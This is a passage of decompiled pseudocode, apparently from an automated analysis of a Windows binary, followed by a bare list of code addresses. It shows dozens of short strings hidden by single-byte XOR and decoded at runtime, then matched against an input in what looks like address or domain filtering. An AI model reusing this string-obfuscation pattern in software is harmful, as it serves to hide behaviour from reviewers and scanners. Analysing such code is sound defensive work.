                                                                    										 *(_t1655 + _t1181 + 0x190) =  *(_t1655 + _t1181 + 0x190) ^ 0x000000dc;
                                                                    										_t1181 = _t1181 + 1;
                                                                    										__eflags = _t1181 - 8;
                                                                    									} while (_t1181 < 8);
                                                                    									_t1383 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v708 = 0x34;
                                                                    									_v707 = 0x3b;
                                                                    									_v706 = 0x36;
                                                                    									_v705 = 0x3d;
                                                                    									_v704 = 0x52;
                                                                    									_t1185 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1383 - 0x54;
                                                                    										if(_t1383 >= 0x54) {
                                                                    											_t1383 = _t1383 ^ 0x00000018;
                                                                    											__eflags = _t1383;
                                                                    										}
                                                                    										 *(_t1655 + _t1185 + 0x68) =  *(_t1655 + _t1185 + 0x68) ^ 0x00000052;
                                                                    										_t1185 = _t1185 + 1;
                                                                    										__eflags = _t1185 - 5;
                                                                    									} while (_t1185 < 5);
                                                                    									_t1385 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v772 = 0x1a;
                                                                    									_v771 = 0x13;
                                                                    									_v770 = 8;
                                                                    									_v769 = 0x7d;
                                                                    									_t1189 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1385 - 0x54;
                                                                    										if(_t1385 >= 0x54) {
                                                                    											_t1385 = _t1385 ^ 0x00000018;
                                                                    											__eflags = _t1385;
                                                                    										}
                                                                    										 *(_t1655 + _t1189 + 0x28) =  *(_t1655 + _t1189 + 0x28) ^ 0x0000007d;
                                                                    										_t1189 = _t1189 + 1;
                                                                    										__eflags = _t1189 - 4;
                                                                    									} while (_t1189 < 4);
                                                                    									_v307 = 0xdc;
                                                                    									_t1387 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v308 = 0xd4;
                                                                    									_v306 = 0xdf;
                                                                    									_v305 = 0xd7;
                                                                    									_v304 = 0x9e;
                                                                    									_v303 = 0xd0;
                                                                    									_v302 = 0xd6;
                                                                    									_v301 = 0xc1;
                                                                    									_v300 = 0xc7;
                                                                    									_v299 = 0xc0;
                                                                    									_v298 = 0xb3;
                                                                    									_t1193 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1387 - 0x54;
                                                                    										if(_t1387 >= 0x54) {
                                                                    											_t1387 = _t1387 ^ 0x00000018;
                                                                    											__eflags = _t1387;
                                                                    										}
                                                                    										 *(_t1655 + _t1193 + 0x1f8) =  *(_t1655 + _t1193 + 0x1f8) ^ 0x000000b3;
                                                                    										_t1193 = _t1193 + 1;
                                                                    										__eflags = _t1193 - 0xb;
                                                                    									} while (_t1193 < 0xb);
                                                                    									_t1389 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v532 = 0xef;
                                                                    									_v531 = 0xe7;
                                                                    									_v530 = 0xe7;
                                                                    									_v529 = 0xef;
                                                                    									_v528 = 0xe4;
                                                                    									_v527 = 0xed;
                                                                    									_v526 = 0x88;
                                                                    									_t1197 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1389 - 0x54;
                                                                    										if(_t1389 >= 0x54) {
                                                                    											_t1389 = _t1389 ^ 0x00000018;
                                                                    											__eflags = _t1389;
                                                                    										}
                                                                    										 *(_t1655 + _t1197 + 0x118) =  *(_t1655 + _t1197 + 0x118) ^ 0x00000088;
                                                                    										_t1197 = _t1197 + 1;
                                                                    										__eflags = _t1197 - 7;
                                                                    									} while (_t1197 < 7);
                                                                    									_t1391 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v756 = 8;
                                                                    									_v755 = 5;
                                                                    									_v754 = 0xc;
                                                                    									_v753 = 0x10;
                                                                    									_v752 = 0x60;
                                                                    									_t1201 = 0;
                                                                    									do {
                                                                    										__eflags = _t1391 - 0x54;
                                                                    										if(_t1391 >= 0x54) {
                                                                    											_t1391 = _t1391 ^ 0x00000018;
                                                                    											__eflags = _t1391;
                                                                    										}
                                                                    										 *(_t1655 + _t1201 + 0x38) =  *(_t1655 + _t1201 + 0x38) ^ 0x00000060;
                                                                    										_t1201 = _t1201 + 1;
                                                                    										__eflags = _t1201 - 5;
                                                                    									} while (_t1201 < 5);
                                                                    									_t1393 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v428 = 0x8b;
                                                                    									_v427 = 0x80;
                                                                    									_v426 = 0x8f;
                                                                    									_v425 = 0xcc;
                                                                    									_v424 = 0x81;
                                                                    									_v423 = 0x8d;
                                                                    									_v422 = 0x8f;
                                                                    									_v421 = 0xe2;
                                                                    									_t1205 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1393 - 0x54;
                                                                    										if(_t1393 >= 0x54) {
                                                                    											_t1393 = _t1393 ^ 0x00000018;
                                                                    											__eflags = _t1393;
                                                                    										}
                                                                    										 *(_t1655 + _t1205 + 0x180) =  *(_t1655 + _t1205 + 0x180) ^ 0x000000e2;
                                                                    										_t1205 = _t1205 + 1;
                                                                    										__eflags = _t1205 - 8;
                                                                    									} while (_t1205 < 8);
                                                                    									_t1395 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v516 = 0xd5;
                                                                    									_v515 = 0xdb;
                                                                    									_v514 = 0xcc;
                                                                    									_v513 = 0xd0;
                                                                    									_v512 = 0xdb;
                                                                    									_v511 = 0xd2;
                                                                    									_v510 = 0xbe;
                                                                    									_t1209 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1395 - 0x54;
                                                                    										if(_t1395 >= 0x54) {
                                                                    											_t1395 = _t1395 ^ 0x00000018;
                                                                    											__eflags = _t1395;
                                                                    										}
                                                                    										 *(_t1655 + _t1209 + 0x128) =  *(_t1655 + _t1209 + 0x128) ^ 0x000000be;
                                                                    										_t1209 = _t1209 + 1;
                                                                    										__eflags = _t1209 - 7;
                                                                    									} while (_t1209 < 7);
                                                                    									_t1397 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v420 = 0x47;
                                                                    									_v419 = 0x45;
                                                                    									_v418 = 0x50;
                                                                    									_v417 = 0x43;
                                                                    									_v416 = 0x46;
                                                                    									_v415 = 0x46;
                                                                    									_v414 = 0x4b;
                                                                    									_v413 = 0x2a;
                                                                    									_t1213 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1397 - 0x54;
                                                                    										if(_t1397 >= 0x54) {
                                                                    											_t1397 = _t1397 ^ 0x00000018;
                                                                    											__eflags = _t1397;
                                                                    										}
                                                                    										 *(_t1655 + _t1213 + 0x188) =  *(_t1655 + _t1213 + 0x188) ^ 0x0000002a;
                                                                    										_t1213 = _t1213 + 1;
                                                                    										__eflags = _t1213 - 8;
                                                                    									} while (_t1213 < 8);
                                                                    									_t1399 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v404 = 8;
                                                                    									_v403 = 0x1c;
                                                                    									_v402 = 1;
                                                                    									_v401 = 0xa;
                                                                    									_v400 = 8;
                                                                    									_v399 = 4;
                                                                    									_v398 = 0xc;
                                                                    									_v397 = 0x65;
                                                                    									_t1217 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1399 - 0x54;
                                                                    										if(_t1399 >= 0x54) {
                                                                    											_t1399 = _t1399 ^ 0x00000018;
                                                                    											__eflags = _t1399;
                                                                    										}
                                                                    										 *(_t1655 + _t1217 + 0x198) =  *(_t1655 + _t1217 + 0x198) ^ 0x00000065;
                                                                    										_t1217 = _t1217 + 1;
                                                                    										__eflags = _t1217 - 8;
                                                                    									} while (_t1217 < 8);
                                                                    									_t1401 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v468 = 0xe3;
                                                                    									_v467 = 0xe1;
                                                                    									_v466 = 0xfa;
                                                                    									_v465 = 0xe5;
                                                                    									_v464 = 0xf2;
                                                                    									_v463 = 0xf0;
                                                                    									_v462 = 0xea;
                                                                    									_v461 = 0x93;
                                                                    									_t1221 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1401 - 0x54;
                                                                    										if(_t1401 >= 0x54) {
                                                                    											_t1401 = _t1401 ^ 0x00000018;
                                                                    											__eflags = _t1401;
                                                                    										}
                                                                    										 *(_t1655 + _t1221 + 0x158) =  *(_t1655 + _t1221 + 0x158) ^ 0x00000093;
                                                                    										_t1221 = _t1221 + 1;
                                                                    										__eflags = _t1221 - 8;
                                                                    									} while (_t1221 < 8);
                                                                    									_t1403 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v500 = 0x5f;
                                                                    									_v499 = 0x4b;
                                                                    									_v498 = 0x4e;
                                                                    									_v497 = 0;
                                                                    									_v496 = 0x48;
                                                                    									_v495 = 0x49;
                                                                    									_v494 = 0x2d;
                                                                    									_t1225 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1403 - 0x54;
                                                                    										if(_t1403 >= 0x54) {
                                                                    											_t1403 = _t1403 ^ 0x00000018;
                                                                    											__eflags = _t1403;
                                                                    										}
                                                                    										 *(_t1655 + _t1225 + 0x138) =  *(_t1655 + _t1225 + 0x138) ^ 0x0000002d;
                                                                    										_t1225 = _t1225 + 1;
                                                                    										__eflags = _t1225 - 7;
                                                                    									} while (_t1225 < 7);
                                                                    									_t1405 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v596 = 0xc1;
                                                                    									_v595 = 0xda;
                                                                    									_v594 = 0xc3;
                                                                    									_v593 = 0xd6;
                                                                    									_v592 = 0x9d;
                                                                    									_v591 = 0xb3;
                                                                    									_t1229 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1405 - 0x54;
                                                                    										if(_t1405 >= 0x54) {
                                                                    											_t1405 = _t1405 ^ 0x00000018;
                                                                    											__eflags = _t1405;
                                                                    										}
                                                                    										 *(_t1655 + _t1229 + 0xd8) =  *(_t1655 + _t1229 + 0xd8) ^ 0x000000b3;
                                                                    										_t1229 = _t1229 + 1;
                                                                    										__eflags = _t1229 - 6;
                                                                    									} while (_t1229 < 6);
                                                                    									_t1407 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v368 = 0xf8;
                                                                    									_v367 = 0xee;
                                                                    									_v366 = 0xe5;
                                                                    									_v365 = 0xef;
                                                                    									_v364 = 0xe6;
                                                                    									_v363 = 0xea;
                                                                    									_v362 = 0xe2;
                                                                    									_v361 = 0xe7;
                                                                    									_v360 = 0x8b;
                                                                    									_t1233 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1407 - 0x54;
                                                                    										if(_t1407 >= 0x54) {
                                                                    											_t1407 = _t1407 ^ 0x00000018;
                                                                    											__eflags = _t1407;
                                                                    										}
                                                                    										 *(_t1655 + _t1233 + 0x1bc) =  *(_t1655 + _t1233 + 0x1bc) ^ 0x0000008b;
                                                                    										_t1233 = _t1233 + 1;
                                                                    										__eflags = _t1233 - 9;
                                                                    									} while (_t1233 < 9);
                                                                    									_t1409 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v460 = 0x9f;
                                                                    									_v459 = 0x89;
                                                                    									_v458 = 0x9e;
                                                                    									_v457 = 0x9a;
                                                                    									_v456 = 0x85;
                                                                    									_v455 = 0x8f;
                                                                    									_v454 = 0x89;
                                                                    									_v453 = 0xec;
                                                                    									_t1237 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1409 - 0x54;
                                                                    										if(_t1409 >= 0x54) {
                                                                    											_t1409 = _t1409 ^ 0x00000018;
                                                                    											__eflags = _t1409;
                                                                    										}
                                                                    										 *(_t1655 + _t1237 + 0x160) =  *(_t1655 + _t1237 + 0x160) ^ 0x000000ec;
                                                                    										_t1237 = _t1237 + 1;
                                                                    										__eflags = _t1237 - 8;
                                                                    									} while (_t1237 < 8);
                                                                    									_t1411 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v356 = 0x37;
                                                                    									_v355 = 0x2b;
                                                                    									_v354 = 0x29;
                                                                    									_v353 = 0x21;
                                                                    									_v352 = 0x26;
                                                                    									_v351 = 0x2b;
                                                                    									_v350 = 0x20;
                                                                    									_v349 = 0x3d;
                                                                    									_v348 = 0x44;
                                                                    									_t1241 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1411 - 0x54;
                                                                    										if(_t1411 >= 0x54) {
                                                                    											_t1411 = _t1411 ^ 0x00000018;
                                                                    											__eflags = _t1411;
                                                                    										}
                                                                    										 *(_t1655 + _t1241 + 0x1c8) =  *(_t1655 + _t1241 + 0x1c8) ^ 0x00000044;
                                                                    										_t1241 = _t1241 + 1;
                                                                    										__eflags = _t1241 - 9;
                                                                    									} while (_t1241 < 9);
                                                                    									_t1413 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v444 = 0x5f;
                                                                    									_v443 = 0x43;
                                                                    									_v442 = 0x41;
                                                                    									_v441 = 0x49;
                                                                    									_v440 = 0x43;
                                                                    									_v439 = 0x42;
                                                                    									_v438 = 0x49;
                                                                    									_v437 = 0x2c;
                                                                    									_t1245 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1413 - 0x54;
                                                                    										if(_t1413 >= 0x54) {
                                                                    											_t1413 = _t1413 ^ 0x00000018;
                                                                    											__eflags = _t1413;
                                                                    										}
                                                                    										 *(_t1655 + _t1245 + 0x170) =  *(_t1655 + _t1245 + 0x170) ^ 0x0000002c;
                                                                    										_t1245 = _t1245 + 1;
                                                                    										__eflags = _t1245 - 8;
                                                                    									} while (_t1245 < 8);
                                                                    									_t1415 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v484 = 0x69;
                                                                    									_v483 = 0x6f;
                                                                    									_v482 = 0x79;
                                                                    									_v481 = 0x72;
                                                                    									_v480 = 0x79;
                                                                    									_v479 = 0x68;
                                                                    									_v478 = 0x1c;
                                                                    									_t1249 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1415 - 0x54;
                                                                    										if(_t1415 >= 0x54) {
                                                                    											_t1415 = _t1415 ^ 0x00000018;
                                                                    											__eflags = _t1415;
                                                                    										}
                                                                    										 *(_t1655 + _t1249 + 0x148) =  *(_t1655 + _t1249 + 0x148) ^ 0x0000001c;
                                                                    										_t1249 = _t1249 + 1;
                                                                    										__eflags = _t1249 - 7;
                                                                    									} while (_t1249 < 7);
                                                                    									_t1417 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v784 = 0xd1;
                                                                    									_v783 = 0xd1;
                                                                    									_v782 = 0xd1;
                                                                    									_v781 = 0xa6;
                                                                    									_t1253 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1417 - 0x54;
                                                                    										if(_t1417 >= 0x54) {
                                                                    											_t1417 = _t1417 ^ 0x00000018;
                                                                    											__eflags = _t1417;
                                                                    										}
                                                                    										 *(_t1655 + _t1253 + 0x1c) =  *(_t1655 + _t1253 + 0x1c) ^ 0x000000a6;
                                                                    										_t1253 = _t1253 + 1;
                                                                    										__eflags = _t1253 - 4;
                                                                    									} while (_t1253 < 4);
                                                                    									_t1419 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v776 = 0xee;
                                                                    									_v775 = 0xf8;
                                                                    									_v774 = 0xe2;
                                                                    									_v773 = 0x97;
                                                                    									_t1257 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1419 - 0x54;
                                                                    										if(_t1419 >= 0x54) {
                                                                    											_t1419 = _t1419 ^ 0x00000018;
                                                                    											__eflags = _t1419;
                                                                    										}
                                                                    										 *(_t1655 + _t1257 + 0x24) =  *(_t1655 + _t1257 + 0x24) ^ 0x00000097;
                                                                    										_t1257 = _t1257 + 1;
                                                                    										__eflags = _t1257 - 4;
                                                                    									} while (_t1257 < 4);
                                                                    									_t1421 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v748 = 0x8d;
                                                                    									_v747 = 0x9b;
                                                                    									_v746 = 0x81;
                                                                    									_v745 = 0x86;
                                                                    									_v744 = 0xf4;
                                                                    									_t1261 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1421 - 0x54;
                                                                    										if(_t1421 >= 0x54) {
                                                                    											_t1421 = _t1421 ^ 0x00000018;
                                                                    											__eflags = _t1421;
                                                                    										}
                                                                    										 *(_t1655 + _t1261 + 0x40) =  *(_t1655 + _t1261 + 0x40) ^ 0x000000f4;
                                                                    										_t1261 = _t1261 + 1;
                                                                    										__eflags = _t1261 - 5;
                                                                    									} while (_t1261 < 5);
                                                                    									_t1423 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v524 = 0x90;
                                                                    									_v523 = 0x81;
                                                                    									_v522 = 0x90;
                                                                    									_v521 = 0x92;
                                                                    									_v520 = 0x99;
                                                                    									_v519 = 0x94;
                                                                    									_v518 = 0xf1;
                                                                    									_t1265 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1423 - 0x54;
                                                                    										if(_t1423 >= 0x54) {
                                                                    											_t1423 = _t1423 ^ 0x00000018;
                                                                    											__eflags = _t1423;
                                                                    										}
                                                                    										 *(_t1655 + _t1265 + 0x120) =  *(_t1655 + _t1265 + 0x120) ^ 0x000000f1;
                                                                    										_t1265 = _t1265 + 1;
                                                                    										__eflags = _t1265 - 7;
                                                                    									} while (_t1265 < 7);
                                                                    									_t1425 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v792 = 0x75;
                                                                    									_v791 = 0x75;
                                                                    									_v790 = 0xd;
                                                                    									_t1269 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1425 - 0x54;
                                                                    										if(_t1425 >= 0x54) {
                                                                    											_t1425 = _t1425 ^ 0x00000018;
                                                                    											__eflags = _t1425;
                                                                    										}
                                                                    										 *(_t1655 + _t1269 + 0x14) =  *(_t1655 + _t1269 + 0x14) ^ 0x0000000d;
                                                                    										_t1269 = _t1269 + 1;
                                                                    										__eflags = _t1269 - 3;
                                                                    									} while (_t1269 < 3);
                                                                    									_t1273 = (_v796 * 0x00000042 | _t958) + ((_v796 * 0x00000042 | _t958) << 4) + _v796;
                                                                    									_v768 = 0x1e;
                                                                    									_v767 = 0xc;
                                                                    									_v766 = 8;
                                                                    									_v765 = 0x78;
                                                                    									_t962 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1273 - 0x54;
                                                                    										if(_t1273 >= 0x54) {
                                                                    											_t1273 = _t1273 ^ 0x00000018;
                                                                    											__eflags = _t1273;
                                                                    										}
                                                                    										 *(_t1655 + _t962 + 0x2c) =  *(_t1655 + _t962 + 0x2c) ^ 0x00000078;
                                                                    										_t962 = _t962 + 1;
                                                                    										__eflags = _t962 - 4;
                                                                    									} while (_t962 < 4);
                                                                    									_v260 =  &_v668;
                                                                    									_v256 =  &_v580;
                                                                    									_v252 =  &_v644;
                                                                    									_v248 =  &_v452;
                                                                    									_v244 =  &_v556;
                                                                    									_v240 =  &_v492;
                                                                    									_v236 =  &_v540;
                                                                    									_v232 =  &_v692;
                                                                    									_v228 =  &_v508;
                                                                    									_v224 =  &_v380;
                                                                    									_v220 =  &_v740;
                                                                    									_v216 =  &_v612;
                                                                    									_v212 =  &_v628;
                                                                    									_v208 =  &_v676;
                                                                    									_v204 =  &_v572;
                                                                    									_v200 =  &_v660;
                                                                    									_v196 =  &_v388;
                                                                    									_v192 =  &_v436;
                                                                    									_v188 =  &_v700;
                                                                    									_v184 =  &_v564;
                                                                    									_v180 =  &_v716;
                                                                    									_v176 =  &_v684;
                                                                    									_v172 =  &_v476;
                                                                    									_v168 =  &_v780;
                                                                    									_v164 =  &_v652;
                                                                    									_v160 =  &_v636;
                                                                    									_v156 =  &_v332;
                                                                    									_v152 =  &_v320;
                                                                    									_v148 =  &_v620;
                                                                    									_v144 =  &_v604;
                                                                    									_v140 =  &_v588;
                                                                    									_v136 =  &_v788;
                                                                    									_v132 =  &_v548;
                                                                    									_v128 =  &_v764;
                                                                    									_v124 =  &_v732;
                                                                    									_v120 =  &_v724;
                                                                    									_v116 =  &_v344;
                                                                    									_v112 =  &_v396;
                                                                    									_v108 =  &_v412;
                                                                    									_v104 =  &_v708;
                                                                    									_t1455 = _a4;
                                                                    									_v100 =  &_v772;
                                                                    									_v96 =  &_v308;
                                                                    									_v92 =  &_v532;
                                                                    									_v88 =  &_v756;
                                                                    									_v84 =  &_v428;
                                                                    									_v80 =  &_v516;
                                                                    									_v76 =  &_v420;
                                                                    									_v72 =  &_v404;
                                                                    									_v68 =  &_v468;
                                                                    									_v64 =  &_v500;
                                                                    									_v60 =  &_v596;
                                                                    									_v56 =  &_v368;
                                                                    									_v52 =  &_v460;
                                                                    									_v48 =  &_v356;
                                                                    									_v44 =  &_v444;
                                                                    									_v40 =  &_v484;
                                                                    									_v36 =  &_v784;
                                                                    									_v32 =  &_v776;
                                                                    									_v28 =  &_v748;
                                                                    									_v24 =  &_v524;
                                                                    									_v20 =  &_v792;
                                                                    									_v16 =  &_v768;
                                                                    									_t1649 = 0;
                                                                    									__eflags = 0;
                                                                    									while(1) {
                                                                    										_t984 = E0041A010(_t1455,  *((intOrPtr*)(_t1655 + 0x228 + _t1649 * 4)));
                                                                    										_t1655 = _t1655 + 8;
                                                                    										__eflags = _t984;
                                                                    										if(_t984 != 0) {
                                                                    											break;
                                                                    										}
                                                                    										_t1649 = _t1649 + 1;
                                                                    										__eflags = _t1649 - 0x3e;
                                                                    										if(_t1649 < 0x3e) {
                                                                    											continue;
                                                                    										}
                                                                    										__eflags = _v264 - 0x10;
                                                                    										if(_v264 >= 0x10) {
                                                                    											_push(_v284);
                                                                    											L00421F9D();
                                                                    											_t1655 = _t1655 + 4;
                                                                    										}
                                                                    										_t946 = 1;
                                                                    										goto L287;
                                                                    									}
                                                                    									__eflags = _v264 - 0x10;
                                                                    									goto L291;
                                                                    								} else {
                                                                    									_t1456 = _v796;
                                                                    									_t1010 = _t1000 & 0x000000ff;
                                                                    									do {
                                                                    										_t1457 = _t1456 - _t1010;
                                                                    										_t987 = E004225E1( *_t1465);
                                                                    										_t1655 = _t1655 + 4;
                                                                    										__eflags = _t987;
                                                                    										if(_t987 != 0) {
                                                                    											goto L29;
                                                                    										}
                                                                    										_t989 = E00422620( *_t1465);
                                                                    										_t1655 = _t1655 + 4;
                                                                    										__eflags = _t989;
                                                                    										if(_t989 != 0) {
                                                                    											goto L29;
                                                                    										}
                                                                    										_t990 =  *_t1465;
                                                                    										__eflags = _t990 - 0x2e;
                                                                    										if(_t990 == 0x2e) {
                                                                    											goto L29;
                                                                    										}
                                                                    										__eflags = _t990 - 0x5f;
                                                                    										if(_t990 == 0x5f) {
                                                                    											goto L29;
                                                                    										}
                                                                    										__eflags = _t990 - 0x2d;
                                                                    										if(_t990 != 0x2d) {
                                                                    											__eflags = _t1465 - _t1651;
                                                                    											if(_t1465 == _t1651) {
                                                                    												goto L33;
                                                                    											}
                                                                    											__eflags = _v264 - 0x10;
                                                                    											L291:
                                                                    											if(__eflags >= 0) {
                                                                    												_push(_v284);
                                                                    												L00421F9D();
                                                                    												_t1655 = _t1655 + 4;
                                                                    											}
                                                                    											_t946 = 0;
                                                                    											L287:
                                                                    											L288:
                                                                    											 *[fs:0x0] = _v12;
                                                                    											return _t946;
                                                                    										}
                                                                    										L29:
                                                                    										__eflags = _t1457 - 0x61;
                                                                    										if(_t1457 >= 0x61) {
                                                                    											_t1456 = _t1457 + _t1457 * 2 << 4;
                                                                    											__eflags = _t1456;
                                                                    										} else {
                                                                    											_t1456 = _t1457 ^ 0x00000048;
                                                                    										}
                                                                    										_t1465 = _t1465 + 1;
                                                                    										__eflags = _t1465 - _t1651;
                                                                    									} while (_t1465 != _t1651);
                                                                    									goto L33;
                                                                    								}
                                                                    							}
                                                                    							do {
                                                                    								_t991 =  *_t1464;
                                                                    								__eflags = _t991 - 0x2e;
                                                                    								if(_t991 == 0x2e) {
                                                                    									L17:
                                                                    									_t19 = _t1464 + 1; // 0x0
                                                                    									E00408820( &_v288, _t19, _t1454);
                                                                    									_t1454 = _t1464;
                                                                    									_t994 = E00407470( &_v296);
                                                                    									__eflags = _t994;
                                                                    									if(_t994 == 0) {
                                                                    										goto L11;
                                                                    									}
                                                                    									goto L18;
                                                                    								}
                                                                    								__eflags = _t991 - 0x40;
                                                                    								if(_t991 != 0x40) {
                                                                    									goto L18;
                                                                    								}
                                                                    								goto L17;
                                                                    								L18:
                                                                    								_t1464 = _t1464 - 1;
                                                                    								__eflags = _t1464 - _t1651;
                                                                    							} while (_t1464 >= _t1651);
                                                                    							goto L19;
                                                                    						}
                                                                    						L11:
                                                                    						E004023A0( &_v288);
                                                                    						goto L12;
                                                                    					}
                                                                    				}
                                                                    				_t946 = 0;
                                                                    				goto L288;
                                                                    			}






























































































































































































































































































































































































































































































































































































































































                                                                    0x00408980
                                                                    0x00408982
                                                                    0x0040898d
                                                                    0x0040898e
                                                                    0x00408995
                                                                    0x0040899c
                                                                    0x004089a8
                                                                    0x004089af
                                                                    0x004089b9
                                                                    0x004089c0
                                                                    0x004089c3
                                                                    0x004089ce
                                                                    0x004089ce
                                                                    0x004089d0
                                                                    0x004089c5
                                                                    0x004089c5
                                                                    0x004089c5
                                                                    0x004089db
                                                                    0x004089dd
                                                                    0x004089e0
                                                                    0x004089e2
                                                                    0x00408a88
                                                                    0x00408a88
                                                                    0x00000000
                                                                    0x004089e8
                                                                    0x004089ec
                                                                    0x004089ef
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004089f5
                                                                    0x004089fc
                                                                    0x00408a01
                                                                    0x00408a01
                                                                    0x00408a04
                                                                    0x00408a10
                                                                    0x00408a10
                                                                    0x00408a13
                                                                    0x00408a15
                                                                    0x00408a15
                                                                    0x00408a15
                                                                    0x00408a21
                                                                    0x00408a2a
                                                                    0x00408a2c
                                                                    0x00408a2f
                                                                    0x00408a31
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408a33
                                                                    0x00408a3e
                                                                    0x00408a45
                                                                    0x00408a4d
                                                                    0x00408a58
                                                                    0x00408a5f
                                                                    0x00408a73
                                                                    0x00408a78
                                                                    0x00408a7a
                                                                    0x00408a93
                                                                    0x00408a98
                                                                    0x00408a9a
                                                                    0x00408a9b
                                                                    0x00408a9d
                                                                    0x00408ada
                                                                    0x00408ada
                                                                    0x00408add
                                                                    0x00408ae8
                                                                    0x00408ae8
                                                                    0x00408aea
                                                                    0x00408adf
                                                                    0x00408adf
                                                                    0x00408adf
                                                                    0x00408aec
                                                                    0x00408af3
                                                                    0x00408af5
                                                                    0x00408b4a
                                                                    0x00408b4e
                                                                    0x00408b55
                                                                    0x00408b66
                                                                    0x00408b69
                                                                    0x00408b70
                                                                    0x00408b78
                                                                    0x00408b80
                                                                    0x00408b88
                                                                    0x00408b90
                                                                    0x00408b98
                                                                    0x00408b98
                                                                    0x00408ba0
                                                                    0x00408ba0
                                                                    0x00408ba3
                                                                    0x00408ba5
                                                                    0x00408ba5
                                                                    0x00408ba5
                                                                    0x00408ba8
                                                                    0x00408bb0
                                                                    0x00408bb1
                                                                    0x00408bb1
                                                                    0x00408bc8
                                                                    0x00408bd1
                                                                    0x00408bd4
                                                                    0x00408bdc
                                                                    0x00408be3
                                                                    0x00408beb
                                                                    0x00408bf3
                                                                    0x00408bfb
                                                                    0x00408c03
                                                                    0x00408c03
                                                                    0x00408c05
                                                                    0x00408c05
                                                                    0x00408c08
                                                                    0x00408c0a
                                                                    0x00408c0a
                                                                    0x00408c0a
                                                                    0x00408c0d
                                                                    0x00408c15
                                                                    0x00408c16
                                                                    0x00408c16
                                                                    0x00408c2d
                                                                    0x00408c30
                                                                    0x00408c38
                                                                    0x00408c40
                                                                    0x00408c48
                                                                    0x00408c50
                                                                    0x00408c58
                                                                    0x00408c60
                                                                    0x00408c60
                                                                    0x00408c62
                                                                    0x00408c62
                                                                    0x00408c65
                                                                    0x00408c67
                                                                    0x00408c67
                                                                    0x00408c67
                                                                    0x00408c6a
                                                                    0x00408c72
                                                                    0x00408c73
                                                                    0x00408c73
                                                                    0x00408c8a
                                                                    0x00408c91
                                                                    0x00408c9a
                                                                    0x00408c9d
                                                                    0x00408ca5
                                                                    0x00408cad
                                                                    0x00408cb5
                                                                    0x00408cbd
                                                                    0x00408cc5
                                                                    0x00408ccc
                                                                    0x00408ccc
                                                                    0x00408cd0
                                                                    0x00408cd0
                                                                    0x00408cd3
                                                                    0x00408cd5
                                                                    0x00408cd5
